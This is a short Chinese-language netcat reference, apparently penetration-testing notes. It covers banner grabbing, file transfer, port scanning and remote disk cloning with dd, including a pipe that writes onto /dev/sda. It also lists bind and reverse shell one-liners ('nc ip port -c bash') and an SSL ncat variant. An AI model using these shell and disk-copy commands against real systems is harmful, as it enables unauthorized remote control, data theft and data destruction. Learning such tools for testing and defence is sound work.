banner信息 或 与服务器指定端口通信
nc -nv ip port
-n numeric-only ip address (not dns)
-v verbose (use twice for more verbose)
例如: nc -nv 202.116.2.224 80 也可以利用nc进行 smtp(25) pop3(110) 连接
电子取证
nc -l -p port > sth.txt 等待连接端
ls -alh | nc -nv ip port -q 1 连接客户端
-l listen mode 作为服务端监听 等待连接
-p port (0~65535) 指定端口去监听连接
-q end of file stdio wait 1 second 信息传送完成时,1秒之后结束
文件传输
nc -l -p port > xxx # xxx代表接收的文件
nc -nv ip port < xxx -q 1 #xxx代表要发送的文件,传递结束1秒后,断开连接
或者
nc -l -p port -q 1 < xxx #代表发送的文件
nc -nv ip port >xxx #代表接收的文件
-q 参数永远在发送端
传输目录
tar -cvf - music/ | nc -l -p port -q 1
nc -nv ip port | tar -xvf -
加密传文件
nc -l -p port | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > xxx
mcrypt --flush -Fbq -a rijndael-256 -m ecb < xxx | nc -nv ip port -q 1
nc端口扫描
nc -nvz ip port1-port2
nc -nvzu ip port1-port2
nc 远程克隆磁盘
nc -l -p port | dd of=/dev/sda
dd if=/dev/sda | nc -nv ip port -q 1
远程电子取证,可以将目标服务器硬盘远程复制,或者内存
远程控制
正向
nc -l -p port -c bash
nc ip port
反向
nc -l -p port
nc ip port -c bash
注 windows用户把bash改成cmd
nc缺乏加密和身份验证的功能
ncat包含于nmap工具包中
ncat -c bash --allow ip -nvl port --ssl
ncat -nv ip port --ssl
不同系统/平台的nc参数功能不尽相同
